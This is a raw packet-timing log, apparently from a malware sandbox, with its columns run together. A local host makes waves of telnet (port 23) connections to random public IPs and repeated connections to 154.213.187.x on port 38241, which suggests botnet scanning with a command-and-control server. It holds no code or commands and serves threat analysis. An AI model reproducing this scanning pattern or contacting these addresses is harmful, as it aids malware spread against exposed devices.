            Nov 28, 2024 09:08:14.321969986 CET234058249.247.192.235192.168.2.13
            Nov 28, 2024 09:08:14.321981907 CET2351114142.69.228.228192.168.2.13
            Nov 28, 2024 09:08:14.321991920 CET2334236188.184.230.200192.168.2.13
            Nov 28, 2024 09:08:14.322057962 CET4058223192.168.2.1349.247.192.235
            Nov 28, 2024 09:08:14.322062969 CET3423623192.168.2.13188.184.230.200
            Nov 28, 2024 09:08:14.322067022 CET5111423192.168.2.13142.69.228.228
            Nov 28, 2024 09:08:14.322382927 CET2359868137.151.227.236192.168.2.13
            Nov 28, 2024 09:08:14.322393894 CET233850255.243.232.22192.168.2.13
            Nov 28, 2024 09:08:14.322403908 CET2358800183.250.11.128192.168.2.13
            Nov 28, 2024 09:08:14.322416067 CET2343634107.11.195.187192.168.2.13
            Nov 28, 2024 09:08:14.322424889 CET235844664.77.86.22192.168.2.13
            Nov 28, 2024 09:08:14.322426081 CET3850223192.168.2.1355.243.232.22
            Nov 28, 2024 09:08:14.322427988 CET5986823192.168.2.13137.151.227.236
            Nov 28, 2024 09:08:14.322432995 CET5880023192.168.2.13183.250.11.128
            Nov 28, 2024 09:08:14.322451115 CET4363423192.168.2.13107.11.195.187
            Nov 28, 2024 09:08:14.322451115 CET5844623192.168.2.1364.77.86.22
            Nov 28, 2024 09:08:14.322489023 CET2358688129.250.80.88192.168.2.13
            Nov 28, 2024 09:08:14.322499037 CET233352665.199.158.144192.168.2.13
            Nov 28, 2024 09:08:14.322508097 CET2335450115.93.157.20192.168.2.13
            Nov 28, 2024 09:08:14.322519064 CET235142257.187.152.175192.168.2.13
            Nov 28, 2024 09:08:14.322527885 CET233960437.215.18.142192.168.2.13
            Nov 28, 2024 09:08:14.322527885 CET5868823192.168.2.13129.250.80.88
            Nov 28, 2024 09:08:14.322527885 CET3352623192.168.2.1365.199.158.144
            Nov 28, 2024 09:08:14.322536945 CET2338034154.118.76.100192.168.2.13
            Nov 28, 2024 09:08:14.322546959 CET2337842188.248.193.174192.168.2.13
            Nov 28, 2024 09:08:14.322546959 CET3545023192.168.2.13115.93.157.20
            Nov 28, 2024 09:08:14.322546959 CET5142223192.168.2.1357.187.152.175
            Nov 28, 2024 09:08:14.322555065 CET3960423192.168.2.1337.215.18.142
            Nov 28, 2024 09:08:14.322556019 CET235575875.228.158.75192.168.2.13
            Nov 28, 2024 09:08:14.322566032 CET233571296.239.248.243192.168.2.13
            Nov 28, 2024 09:08:14.322575092 CET234655091.170.177.60192.168.2.13
            Nov 28, 2024 09:08:14.322575092 CET3803423192.168.2.13154.118.76.100
            Nov 28, 2024 09:08:14.322583914 CET3784223192.168.2.13188.248.193.174
            Nov 28, 2024 09:08:14.322587013 CET2349308200.34.63.117192.168.2.13
            Nov 28, 2024 09:08:14.322594881 CET3571223192.168.2.1396.239.248.243
            Nov 28, 2024 09:08:14.322597027 CET5575823192.168.2.1375.228.158.75
            Nov 28, 2024 09:08:14.322597980 CET234570063.24.32.138192.168.2.13
            Nov 28, 2024 09:08:14.322607994 CET4655023192.168.2.1391.170.177.60
            Nov 28, 2024 09:08:14.322619915 CET4930823192.168.2.13200.34.63.117
            Nov 28, 2024 09:08:14.322633028 CET4570023192.168.2.1363.24.32.138
            Nov 28, 2024 09:08:23.901132107 CET3824148896154.213.187.245192.168.2.13
            Nov 28, 2024 09:08:23.901308060 CET4889638241192.168.2.13154.213.187.245
            Nov 28, 2024 09:08:24.023597956 CET3824148896154.213.187.245192.168.2.13
            Nov 28, 2024 09:08:25.164248943 CET4893838241192.168.2.13154.213.187.245
            Nov 28, 2024 09:08:25.187501907 CET4058223192.168.2.1349.247.192.235
            Nov 28, 2024 09:08:25.187550068 CET5111423192.168.2.13142.69.228.228
            Nov 28, 2024 09:08:25.187563896 CET3423623192.168.2.13188.184.230.200
            Nov 28, 2024 09:08:25.187598944 CET5986823192.168.2.13137.151.227.236
            Nov 28, 2024 09:08:25.187618017 CET3850223192.168.2.1355.243.232.22
            Nov 28, 2024 09:08:25.187633991 CET5880023192.168.2.13183.250.11.128
            Nov 28, 2024 09:08:25.187659025 CET4363423192.168.2.13107.11.195.187
            Nov 28, 2024 09:08:25.187671900 CET5844623192.168.2.1364.77.86.22
            Nov 28, 2024 09:08:25.187728882 CET3352623192.168.2.1365.199.158.144
            Nov 28, 2024 09:08:25.187731028 CET5868823192.168.2.13129.250.80.88
            Nov 28, 2024 09:08:25.187771082 CET3545023192.168.2.13115.93.157.20
            Nov 28, 2024 09:08:25.187808037 CET5142223192.168.2.1357.187.152.175
            Nov 28, 2024 09:08:25.187835932 CET3960423192.168.2.1337.215.18.142
            Nov 28, 2024 09:08:25.187850952 CET3803423192.168.2.13154.118.76.100
            Nov 28, 2024 09:08:25.187880039 CET3784223192.168.2.13188.248.193.174
            Nov 28, 2024 09:08:25.187896967 CET5575823192.168.2.1375.228.158.75
            Nov 28, 2024 09:08:25.187930107 CET3571223192.168.2.1396.239.248.243
            Nov 28, 2024 09:08:25.187983036 CET4655023192.168.2.1391.170.177.60
            Nov 28, 2024 09:08:25.188004971 CET4930823192.168.2.13200.34.63.117
            Nov 28, 2024 09:08:25.188033104 CET4570023192.168.2.1363.24.32.138
            Nov 28, 2024 09:08:25.284373045 CET3824148938154.213.187.245192.168.2.13
            Nov 28, 2024 09:08:25.284488916 CET4893838241192.168.2.13154.213.187.245
            Nov 28, 2024 09:08:25.285362959 CET4893838241192.168.2.13154.213.187.245
            Nov 28, 2024 09:08:25.308080912 CET234058249.247.192.235192.168.2.13
            Nov 28, 2024 09:08:25.308123112 CET2351114142.69.228.228192.168.2.13
            Nov 28, 2024 09:08:25.308135986 CET2334236188.184.230.200192.168.2.13
            Nov 28, 2024 09:08:25.308146954 CET2359868137.151.227.236192.168.2.13
            Nov 28, 2024 09:08:25.308151960 CET4058223192.168.2.1349.247.192.235
            Nov 28, 2024 09:08:25.308157921 CET2358800183.250.11.128192.168.2.13
            Nov 28, 2024 09:08:25.308171034 CET233850255.243.232.22192.168.2.13
            Nov 28, 2024 09:08:25.308183908 CET2343634107.11.195.187192.168.2.13
            Nov 28, 2024 09:08:25.308191061 CET5880023192.168.2.13183.250.11.128
            Nov 28, 2024 09:08:25.308187008 CET5111423192.168.2.13142.69.228.228
            Nov 28, 2024 09:08:25.308203936 CET235844664.77.86.22192.168.2.13
            Nov 28, 2024 09:08:25.308216095 CET233352665.199.158.144192.168.2.13
            Nov 28, 2024 09:08:25.308214903 CET3850223192.168.2.1355.243.232.22
            Nov 28, 2024 09:08:25.308227062 CET5986823192.168.2.13137.151.227.236
            Nov 28, 2024 09:08:25.308227062 CET4363423192.168.2.13107.11.195.187
            Nov 28, 2024 09:08:25.308248043 CET3352623192.168.2.1365.199.158.144
            Nov 28, 2024 09:08:25.308267117 CET5844623192.168.2.1364.77.86.22
            Nov 28, 2024 09:08:25.308362007 CET3423623192.168.2.13188.184.230.200
            Nov 28, 2024 09:08:25.308372974 CET2358688129.250.80.88192.168.2.13
            Nov 28, 2024 09:08:25.308393002 CET2335450115.93.157.20192.168.2.13
            Nov 28, 2024 09:08:25.308412075 CET235142257.187.152.175192.168.2.13
            Nov 28, 2024 09:08:25.308423042 CET234570063.24.32.138192.168.2.13
            Nov 28, 2024 09:08:25.308434010 CET2349308200.34.63.117192.168.2.13
            Nov 28, 2024 09:08:25.308438063 CET5868823192.168.2.13129.250.80.88
            Nov 28, 2024 09:08:25.308444977 CET234655091.170.177.60192.168.2.13
            Nov 28, 2024 09:08:25.308456898 CET233571296.239.248.243192.168.2.13
            Nov 28, 2024 09:08:25.308464050 CET3545023192.168.2.13115.93.157.20
            Nov 28, 2024 09:08:25.308465004 CET5142223192.168.2.1357.187.152.175
            Nov 28, 2024 09:08:25.308583975 CET235575875.228.158.75192.168.2.13
            Nov 28, 2024 09:08:25.308595896 CET2337842188.248.193.174192.168.2.13
            Nov 28, 2024 09:08:25.308605909 CET2338034154.118.76.100192.168.2.13
            Nov 28, 2024 09:08:25.308617115 CET233960437.215.18.142192.168.2.13
            Nov 28, 2024 09:08:25.309077024 CET233960437.215.18.142192.168.2.13
            Nov 28, 2024 09:08:25.309087992 CET2338034154.118.76.100192.168.2.13
            Nov 28, 2024 09:08:25.309099913 CET2337842188.248.193.174192.168.2.13
            Nov 28, 2024 09:08:25.309134960 CET3784223192.168.2.13188.248.193.174
            Nov 28, 2024 09:08:25.309137106 CET3803423192.168.2.13154.118.76.100
            Nov 28, 2024 09:08:25.309148073 CET3960423192.168.2.1337.215.18.142
            Nov 28, 2024 09:08:25.309169054 CET235575875.228.158.75192.168.2.13
            Nov 28, 2024 09:08:25.309180021 CET233571296.239.248.243192.168.2.13
            Nov 28, 2024 09:08:25.309189081 CET234655091.170.177.60192.168.2.13
            Nov 28, 2024 09:08:25.309200048 CET2349308200.34.63.117192.168.2.13
            Nov 28, 2024 09:08:25.309214115 CET5575823192.168.2.1375.228.158.75
            Nov 28, 2024 09:08:25.309221983 CET3571223192.168.2.1396.239.248.243
            Nov 28, 2024 09:08:25.309237957 CET234570063.24.32.138192.168.2.13
            Nov 28, 2024 09:08:25.309250116 CET4655023192.168.2.1391.170.177.60
            Nov 28, 2024 09:08:25.309256077 CET4930823192.168.2.13200.34.63.117
            Nov 28, 2024 09:08:25.309294939 CET4570023192.168.2.1363.24.32.138
            Nov 28, 2024 09:08:25.405314922 CET3824148938154.213.187.245192.168.2.13
            Nov 28, 2024 09:08:25.405405045 CET4893838241192.168.2.13154.213.187.245
            Nov 28, 2024 09:08:25.525468111 CET3824148938154.213.187.245192.168.2.13
            Nov 28, 2024 09:08:27.191190958 CET5623023192.168.2.1328.0.24.239
            Nov 28, 2024 09:08:27.192009926 CET4430023192.168.2.1344.27.16.43
            Nov 28, 2024 09:08:27.192708015 CET4586823192.168.2.1314.238.106.59
            Nov 28, 2024 09:08:27.193353891 CET3366023192.168.2.138.190.222.81
            Nov 28, 2024 09:08:27.194035053 CET4784823192.168.2.13116.239.96.85
            Nov 28, 2024 09:08:27.194710970 CET3993023192.168.2.1394.121.156.58
            Nov 28, 2024 09:08:27.195415974 CET4926623192.168.2.1367.38.220.100
            Nov 28, 2024 09:08:27.196247101 CET3457623192.168.2.1379.245.251.25
            Nov 28, 2024 09:08:27.197029114 CET3896223192.168.2.13183.41.89.77
            Nov 28, 2024 09:08:27.197674036 CET5397023192.168.2.13110.210.96.248
            Nov 28, 2024 09:08:27.198380947 CET3567623192.168.2.13136.105.104.197
            Nov 28, 2024 09:08:27.199033022 CET5220223192.168.2.135.63.99.24
            Nov 28, 2024 09:08:27.199716091 CET3633823192.168.2.136.130.54.74
            Nov 28, 2024 09:08:27.200479031 CET5144623192.168.2.13169.197.67.81
            Nov 28, 2024 09:08:27.201184988 CET3984023192.168.2.13211.227.21.154
            Nov 28, 2024 09:08:27.201872110 CET4440423192.168.2.13172.75.107.121
            Nov 28, 2024 09:08:27.202574968 CET4618023192.168.2.13159.69.84.143
            Nov 28, 2024 09:08:27.203238964 CET6098023192.168.2.131.76.53.5
            Nov 28, 2024 09:08:27.203918934 CET6009223192.168.2.13157.171.18.160
            Nov 28, 2024 09:08:27.204612970 CET5768423192.168.2.13169.143.93.20
            Nov 28, 2024 09:08:27.311381102 CET235623028.0.24.239192.168.2.13
            Nov 28, 2024 09:08:27.311486006 CET5623023192.168.2.1328.0.24.239
            Nov 28, 2024 09:08:27.311980009 CET234430044.27.16.43192.168.2.13
            Nov 28, 2024 09:08:27.312093019 CET4430023192.168.2.1344.27.16.43
            Nov 28, 2024 09:08:27.312699080 CET234586814.238.106.59192.168.2.13
            Nov 28, 2024 09:08:27.312758923 CET4586823192.168.2.1314.238.106.59
            Nov 28, 2024 09:08:27.313338995 CET23336608.190.222.81192.168.2.13
            Nov 28, 2024 09:08:27.313385010 CET3366023192.168.2.138.190.222.81
            Nov 28, 2024 09:08:27.313963890 CET2347848116.239.96.85192.168.2.13
            Nov 28, 2024 09:08:27.314014912 CET4784823192.168.2.13116.239.96.85
            Nov 28, 2024 09:08:27.314676046 CET233993094.121.156.58192.168.2.13
            Nov 28, 2024 09:08:27.314738035 CET3993023192.168.2.1394.121.156.58
            Nov 28, 2024 09:08:27.315326929 CET234926667.38.220.100192.168.2.13
            Nov 28, 2024 09:08:27.315391064 CET4926623192.168.2.1367.38.220.100
            Nov 28, 2024 09:08:27.316145897 CET233457679.245.251.25192.168.2.13
            Nov 28, 2024 09:08:27.316194057 CET3457623192.168.2.1379.245.251.25
            Nov 28, 2024 09:08:27.316915989 CET2338962183.41.89.77192.168.2.13
            Nov 28, 2024 09:08:27.316981077 CET3896223192.168.2.13183.41.89.77
            Nov 28, 2024 09:08:27.317600012 CET2353970110.210.96.248192.168.2.13
            Nov 28, 2024 09:08:27.317652941 CET5397023192.168.2.13110.210.96.248
            Nov 28, 2024 09:08:27.318286896 CET2335676136.105.104.197192.168.2.13
            Nov 28, 2024 09:08:27.318331957 CET3567623192.168.2.13136.105.104.197
            Nov 28, 2024 09:08:27.318896055 CET23522025.63.99.24192.168.2.13
            Nov 28, 2024 09:08:27.318944931 CET5220223192.168.2.135.63.99.24
            Nov 28, 2024 09:08:27.319562912 CET23363386.130.54.74192.168.2.13
            Nov 28, 2024 09:08:27.319613934 CET3633823192.168.2.136.130.54.74
            Nov 28, 2024 09:08:27.320382118 CET2351446169.197.67.81192.168.2.13
            Nov 28, 2024 09:08:27.320440054 CET5144623192.168.2.13169.197.67.81
            Nov 28, 2024 09:08:27.321182966 CET2339840211.227.21.154192.168.2.13
            Nov 28, 2024 09:08:27.321243048 CET3984023192.168.2.13211.227.21.154
            Nov 28, 2024 09:08:27.321827888 CET2344404172.75.107.121192.168.2.13
            Nov 28, 2024 09:08:27.321871042 CET4440423192.168.2.13172.75.107.121
            Nov 28, 2024 09:08:27.322484016 CET2346180159.69.84.143192.168.2.13
            Nov 28, 2024 09:08:27.322546005 CET4618023192.168.2.13159.69.84.143
            Nov 28, 2024 09:08:27.323191881 CET23609801.76.53.5192.168.2.13
            Nov 28, 2024 09:08:27.323299885 CET6098023192.168.2.131.76.53.5
            Nov 28, 2024 09:08:27.323832989 CET2360092157.171.18.160192.168.2.13
            Nov 28, 2024 09:08:27.323889971 CET6009223192.168.2.13157.171.18.160
            Nov 28, 2024 09:08:27.324474096 CET2357684169.143.93.20192.168.2.13
            Nov 28, 2024 09:08:27.324528933 CET5768423192.168.2.13169.143.93.20
            Nov 28, 2024 09:08:29.597850084 CET2346180159.69.84.143192.168.2.13
            Nov 28, 2024 09:08:29.598119974 CET4618023192.168.2.13159.69.84.143
            Nov 28, 2024 09:08:29.598683119 CET4171423192.168.2.1362.248.30.217
            Nov 28, 2024 09:08:29.718153000 CET2346180159.69.84.143192.168.2.13
            Nov 28, 2024 09:08:29.718607903 CET234171462.248.30.217192.168.2.13
            Nov 28, 2024 09:08:29.718750954 CET4171423192.168.2.1362.248.30.217
            Nov 28, 2024 09:08:29.899509907 CET2339840211.227.21.154192.168.2.13
            Nov 28, 2024 09:08:29.900536060 CET3984023192.168.2.13211.227.21.154
            Nov 28, 2024 09:08:30.600298882 CET3984023192.168.2.13211.227.21.154
            Nov 28, 2024 09:08:30.600749016 CET3331823192.168.2.1347.83.136.212
            Nov 28, 2024 09:08:30.720441103 CET2339840211.227.21.154192.168.2.13
            Nov 28, 2024 09:08:30.720654964 CET233331847.83.136.212192.168.2.13
            Nov 28, 2024 09:08:30.720746040 CET3331823192.168.2.1347.83.136.212
            Nov 28, 2024 09:08:36.365957022 CET3824148938154.213.187.245192.168.2.13
            Nov 28, 2024 09:08:36.366239071 CET4893838241192.168.2.13154.213.187.245
            Nov 28, 2024 09:08:36.548166037 CET3824148938154.213.187.245192.168.2.13
            Nov 28, 2024 09:08:37.608019114 CET5377638241192.168.2.13154.213.187.249
            Nov 28, 2024 09:08:37.610373020 CET5623023192.168.2.1328.0.24.239
            Nov 28, 2024 09:08:37.610424042 CET4430023192.168.2.1344.27.16.43
            Nov 28, 2024 09:08:37.610455036 CET4586823192.168.2.1314.238.106.59
            Nov 28, 2024 09:08:37.610471964 CET3366023192.168.2.138.190.222.81
            Nov 28, 2024 09:08:37.610508919 CET4784823192.168.2.13116.239.96.85
            Nov 28, 2024 09:08:37.610524893 CET3993023192.168.2.1394.121.156.58
            Nov 28, 2024 09:08:37.610555887 CET4926623192.168.2.1367.38.220.100
            Nov 28, 2024 09:08:37.610567093 CET3457623192.168.2.1379.245.251.25
            Nov 28, 2024 09:08:37.610599995 CET3896223192.168.2.13183.41.89.77
            Nov 28, 2024 09:08:37.610626936 CET5397023192.168.2.13110.210.96.248
            Nov 28, 2024 09:08:37.610663891 CET3567623192.168.2.13136.105.104.197
            Nov 28, 2024 09:08:37.610678911 CET5220223192.168.2.135.63.99.24
            Nov 28, 2024 09:08:37.610697985 CET3633823192.168.2.136.130.54.74
            Nov 28, 2024 09:08:37.610713959 CET5144623192.168.2.13169.197.67.81
            Nov 28, 2024 09:08:37.610747099 CET4440423192.168.2.13172.75.107.121
            Nov 28, 2024 09:08:37.610788107 CET6098023192.168.2.131.76.53.5
            Nov 28, 2024 09:08:37.610795975 CET6009223192.168.2.13157.171.18.160
            Nov 28, 2024 09:08:37.610811949 CET5768423192.168.2.13169.143.93.20
            Nov 28, 2024 09:08:37.728068113 CET3824153776154.213.187.249192.168.2.13
            Nov 28, 2024 09:08:37.728198051 CET5377638241192.168.2.13154.213.187.249
            Nov 28, 2024 09:08:37.729363918 CET5377638241192.168.2.13154.213.187.249
            Nov 28, 2024 09:08:37.730559111 CET235623028.0.24.239192.168.2.13
            Nov 28, 2024 09:08:37.730627060 CET5623023192.168.2.1328.0.24.239
            Nov 28, 2024 09:08:37.730964899 CET234430044.27.16.43192.168.2.13
            Nov 28, 2024 09:08:37.730993032 CET234586814.238.106.59192.168.2.13
            Nov 28, 2024 09:08:37.731008053 CET23336608.190.222.81192.168.2.13
            Nov 28, 2024 09:08:37.731029987 CET2347848116.239.96.85192.168.2.13
            Nov 28, 2024 09:08:37.731076956 CET233993094.121.156.58192.168.2.13
            Nov 28, 2024 09:08:37.731093884 CET234926667.38.220.100192.168.2.13
            Nov 28, 2024 09:08:37.731096029 CET4586823192.168.2.1314.238.106.59
            Nov 28, 2024 09:08:37.731102943 CET4430023192.168.2.1344.27.16.43
            Nov 28, 2024 09:08:37.731103897 CET3366023192.168.2.138.190.222.81
            Nov 28, 2024 09:08:37.731113911 CET4784823192.168.2.13116.239.96.85
            Nov 28, 2024 09:08:37.731136084 CET3993023192.168.2.1394.121.156.58
            Nov 28, 2024 09:08:37.731146097 CET4926623192.168.2.1367.38.220.100
            Nov 28, 2024 09:08:37.731149912 CET233457679.245.251.25192.168.2.13
            Nov 28, 2024 09:08:37.731163979 CET2338962183.41.89.77192.168.2.13
            Nov 28, 2024 09:08:37.731199980 CET3457623192.168.2.1379.245.251.25
            Nov 28, 2024 09:08:37.731204033 CET3896223192.168.2.13183.41.89.77
            Nov 28, 2024 09:08:37.731257915 CET2353970110.210.96.248192.168.2.13
            Nov 28, 2024 09:08:37.731267929 CET2335676136.105.104.197192.168.2.13
            Nov 28, 2024 09:08:37.731278896 CET23522025.63.99.24192.168.2.13
            Nov 28, 2024 09:08:37.731291056 CET23363386.130.54.74192.168.2.13
            Nov 28, 2024 09:08:37.731307983 CET5397023192.168.2.13110.210.96.248
            Nov 28, 2024 09:08:37.731326103 CET3567623192.168.2.13136.105.104.197
            Nov 28, 2024 09:08:37.731339931 CET3633823192.168.2.136.130.54.74
            Nov 28, 2024 09:08:37.731355906 CET5220223192.168.2.135.63.99.24
            Nov 28, 2024 09:08:37.732403994 CET2351446169.197.67.81192.168.2.13
            Nov 28, 2024 09:08:37.732454062 CET2344404172.75.107.121192.168.2.13
            Nov 28, 2024 09:08:37.732465029 CET2357684169.143.93.20192.168.2.13
            Nov 28, 2024 09:08:37.732476950 CET5144623192.168.2.13169.197.67.81
            Nov 28, 2024 09:08:37.732508898 CET4440423192.168.2.13172.75.107.121
            Nov 28, 2024 09:08:37.732520103 CET23609801.76.53.5192.168.2.13
            Nov 28, 2024 09:08:37.732567072 CET2360092157.171.18.160192.168.2.13
            Nov 28, 2024 09:08:37.732610941 CET2360092157.171.18.160192.168.2.13
            Nov 28, 2024 09:08:37.732620955 CET23609801.76.53.5192.168.2.13
            Nov 28, 2024 09:08:37.732631922 CET2357684169.143.93.20192.168.2.13
            Nov 28, 2024 09:08:37.732671022 CET6009223192.168.2.13157.171.18.160
            Nov 28, 2024 09:08:37.732688904 CET5768423192.168.2.13169.143.93.20
            Nov 28, 2024 09:08:37.732692003 CET6098023192.168.2.131.76.53.5
            Nov 28, 2024 09:08:37.849347115 CET3824153776154.213.187.249192.168.2.13
            Nov 28, 2024 09:08:37.849457979 CET5377638241192.168.2.13154.213.187.249
            Nov 28, 2024 09:08:37.969597101 CET3824153776154.213.187.249192.168.2.13
            Nov 28, 2024 09:08:39.613565922 CET4134023192.168.2.1357.153.199.115
            Nov 28, 2024 09:08:39.614182949 CET5177623192.168.2.13184.230.57.151
            Nov 28, 2024 09:08:39.614855051 CET3675023192.168.2.13104.190.57.93
            Nov 28, 2024 09:08:39.615509987 CET5912823192.168.2.1316.13.187.205
            Nov 28, 2024 09:08:39.616254091 CET4795223192.168.2.1387.130.23.229
            Nov 28, 2024 09:08:39.616913080 CET3775623192.168.2.1329.121.163.152
            Nov 28, 2024 09:08:39.617592096 CET5051023192.168.2.1347.40.215.6
            Nov 28, 2024 09:08:39.618221998 CET4120823192.168.2.13186.161.147.150
            Nov 28, 2024 09:08:39.618869066 CET3980423192.168.2.13205.196.138.243
            Nov 28, 2024 09:08:39.619488955 CET4327223192.168.2.13140.234.42.27
            Nov 28, 2024 09:08:39.620101929 CET4516823192.168.2.1375.208.254.221
            Nov 28, 2024 09:08:39.620763063 CET3508023192.168.2.1359.60.53.31
            Nov 28, 2024 09:08:39.621380091 CET5264423192.168.2.13113.244.50.118
            Nov 28, 2024 09:08:39.621988058 CET3895823192.168.2.13221.19.219.132
            Nov 28, 2024 09:08:39.622606039 CET5954423192.168.2.1358.79.228.72
            Nov 28, 2024 09:08:39.623218060 CET5964223192.168.2.1347.172.98.251
            Nov 28, 2024 09:08:39.623866081 CET5687823192.168.2.1374.200.54.18
            Nov 28, 2024 09:08:39.624496937 CET5729223192.168.2.13185.40.158.90
            Nov 28, 2024 09:08:39.733664989 CET234134057.153.199.115192.168.2.13
            Nov 28, 2024 09:08:39.733874083 CET4134023192.168.2.1357.153.199.115
            Nov 28, 2024 09:08:39.734137058 CET2351776184.230.57.151192.168.2.13
            Nov 28, 2024 09:08:39.734194994 CET5177623192.168.2.13184.230.57.151
            Nov 28, 2024 09:08:39.734685898 CET2336750104.190.57.93192.168.2.13
            Nov 28, 2024 09:08:39.734785080 CET3675023192.168.2.13104.190.57.93
            Nov 28, 2024 09:08:39.735361099 CET235912816.13.187.205192.168.2.13
            Nov 28, 2024 09:08:39.735418081 CET5912823192.168.2.1316.13.187.205
            Nov 28, 2024 09:08:39.736190081 CET234795287.130.23.229192.168.2.13
            Nov 28, 2024 09:08:39.736232042 CET4795223192.168.2.1387.130.23.229
            Nov 28, 2024 09:08:39.736749887 CET233775629.121.163.152192.168.2.13
            Nov 28, 2024 09:08:39.736793041 CET3775623192.168.2.1329.121.163.152
            Nov 28, 2024 09:08:39.737459898 CET235051047.40.215.6192.168.2.13
            Nov 28, 2024 09:08:39.737503052 CET5051023192.168.2.1347.40.215.6
            Nov 28, 2024 09:08:39.738096952 CET2341208186.161.147.150192.168.2.13
            Nov 28, 2024 09:08:39.738147974 CET4120823192.168.2.13186.161.147.150
            Nov 28, 2024 09:08:39.738673925 CET2339804205.196.138.243192.168.2.13
            Nov 28, 2024 09:08:39.738711119 CET3980423192.168.2.13205.196.138.243
            Nov 28, 2024 09:08:39.739295959 CET2343272140.234.42.27192.168.2.13
            Nov 28, 2024 09:08:39.739347935 CET4327223192.168.2.13140.234.42.27
            Nov 28, 2024 09:08:39.739890099 CET234516875.208.254.221192.168.2.13
            Nov 28, 2024 09:08:39.739967108 CET4516823192.168.2.1375.208.254.221
            Nov 28, 2024 09:08:39.740546942 CET233508059.60.53.31192.168.2.13
            Nov 28, 2024 09:08:39.740590096 CET3508023192.168.2.1359.60.53.31
            Nov 28, 2024 09:08:39.741199017 CET2352644113.244.50.118192.168.2.13
            Nov 28, 2024 09:08:39.741255999 CET5264423192.168.2.13113.244.50.118
            Nov 28, 2024 09:08:39.741785049 CET2338958221.19.219.132192.168.2.13
            Nov 28, 2024 09:08:39.741842031 CET3895823192.168.2.13221.19.219.132
            Nov 28, 2024 09:08:39.742425919 CET235954458.79.228.72192.168.2.13
            Nov 28, 2024 09:08:39.742502928 CET5954423192.168.2.1358.79.228.72
            Nov 28, 2024 09:08:39.743010998 CET235964247.172.98.251192.168.2.13
            Nov 28, 2024 09:08:39.743062973 CET5964223192.168.2.1347.172.98.251
            Nov 28, 2024 09:08:39.743812084 CET235687874.200.54.18192.168.2.13
            Nov 28, 2024 09:08:39.743851900 CET5687823192.168.2.1374.200.54.18
            Nov 28, 2024 09:08:39.744338989 CET2357292185.40.158.90192.168.2.13
            Nov 28, 2024 09:08:39.744390011 CET5729223192.168.2.13185.40.158.90
            Nov 28, 2024 09:08:40.625694990 CET4171423192.168.2.1362.248.30.217
            Nov 28, 2024 09:08:40.745743036 CET234171462.248.30.217192.168.2.13
            Nov 28, 2024 09:08:40.745840073 CET4171423192.168.2.1362.248.30.217
            Nov 28, 2024 09:08:42.628349066 CET5135423192.168.2.1362.188.108.92
            Nov 28, 2024 09:08:42.628772020 CET3331823192.168.2.1347.83.136.212
            Nov 28, 2024 09:08:42.749438047 CET235135462.188.108.92192.168.2.13
            Nov 28, 2024 09:08:42.749592066 CET5135423192.168.2.1362.188.108.92
            Nov 28, 2024 09:08:42.749691010 CET233331847.83.136.212192.168.2.13
            Nov 28, 2024 09:08:42.749732018 CET3331823192.168.2.1347.83.136.212
            Nov 28, 2024 09:08:43.630726099 CET6063823192.168.2.1381.142.213.202
            Nov 28, 2024 09:08:43.750792980 CET236063881.142.213.202192.168.2.13
            Nov 28, 2024 09:08:43.750914097 CET6063823192.168.2.1381.142.213.202
            Nov 28, 2024 09:08:49.376689911 CET3824153776154.213.187.249192.168.2.13
            Nov 28, 2024 09:08:49.376959085 CET5377638241192.168.2.13154.213.187.249
            Nov 28, 2024 09:08:49.496997118 CET3824153776154.213.187.249192.168.2.13
            Nov 28, 2024 09:08:50.639842033 CET4134023192.168.2.1357.153.199.115
            Nov 28, 2024 09:08:50.639846087 CET3675023192.168.2.13104.190.57.93
            Nov 28, 2024 09:08:50.639847994 CET5177623192.168.2.13184.230.57.151
            Nov 28, 2024 09:08:50.639852047 CET5912823192.168.2.1316.13.187.205
            Nov 28, 2024 09:08:50.639852047 CET4795223192.168.2.1387.130.23.229
            Nov 28, 2024 09:08:50.639878988 CET3775623192.168.2.1329.121.163.152
            Nov 28, 2024 09:08:50.639880896 CET5051023192.168.2.1347.40.215.6
            Nov 28, 2024 09:08:50.639893055 CET4120823192.168.2.13186.161.147.150
            Nov 28, 2024 09:08:50.639902115 CET4327223192.168.2.13140.234.42.27
            Nov 28, 2024 09:08:50.639903069 CET3980423192.168.2.13205.196.138.243
            Nov 28, 2024 09:08:50.639903069 CET4516823192.168.2.1375.208.254.221
            Nov 28, 2024 09:08:50.639910936 CET3508023192.168.2.1359.60.53.31
            Nov 28, 2024 09:08:50.639933109 CET5264423192.168.2.13113.244.50.118
            Nov 28, 2024 09:08:50.639935970 CET3895823192.168.2.13221.19.219.132
            Nov 28, 2024 09:08:50.639955997 CET5964223192.168.2.1347.172.98.251
            Nov 28, 2024 09:08:50.639956951 CET5954423192.168.2.1358.79.228.72
            Nov 28, 2024 09:08:50.639974117 CET5729223192.168.2.13185.40.158.90
            Nov 28, 2024 09:08:50.639976025 CET5687823192.168.2.1374.200.54.18
            Nov 28, 2024 09:08:50.696091890 CET4293038241192.168.2.13154.213.187.214
            Nov 28, 2024 09:08:50.761013985 CET2336750104.190.57.93192.168.2.13
            Nov 28, 2024 09:08:50.761034012 CET2341208186.161.147.150192.168.2.13
            Nov 28, 2024 09:08:50.761044025 CET2339804205.196.138.243192.168.2.13
            Nov 28, 2024 09:08:50.761066914 CET2343272140.234.42.27192.168.2.13
            Nov 28, 2024 09:08:50.761079073 CET235051047.40.215.6192.168.2.13
            Nov 28, 2024 09:08:50.761090040 CET233775629.121.163.152192.168.2.13
            Nov 28, 2024 09:08:50.761100054 CET234795287.130.23.229192.168.2.13
            Nov 28, 2024 09:08:50.761111975 CET235912816.13.187.205192.168.2.13
            Nov 28, 2024 09:08:50.761132002 CET2351776184.230.57.151192.168.2.13
            Nov 28, 2024 09:08:50.761143923 CET234134057.153.199.115192.168.2.13
            Nov 28, 2024 09:08:50.761147976 CET3675023192.168.2.13104.190.57.93
            Nov 28, 2024 09:08:50.761152983 CET234134057.153.199.115192.168.2.13
            Nov 28, 2024 09:08:50.761162996 CET2351776184.230.57.151192.168.2.13
            Nov 28, 2024 09:08:50.761173010 CET235912816.13.187.205192.168.2.13
            Nov 28, 2024 09:08:50.761183023 CET234795287.130.23.229192.168.2.13
            Nov 28, 2024 09:08:50.761192083 CET233775629.121.163.152192.168.2.13
            Nov 28, 2024 09:08:50.761202097 CET235051047.40.215.6192.168.2.13
            Nov 28, 2024 09:08:50.761209011 CET4134023192.168.2.1357.153.199.115
            Nov 28, 2024 09:08:50.761214018 CET2343272140.234.42.27192.168.2.13
            Nov 28, 2024 09:08:50.761221886 CET5177623192.168.2.13184.230.57.151
            Nov 28, 2024 09:08:50.761223078 CET5912823192.168.2.1316.13.187.205
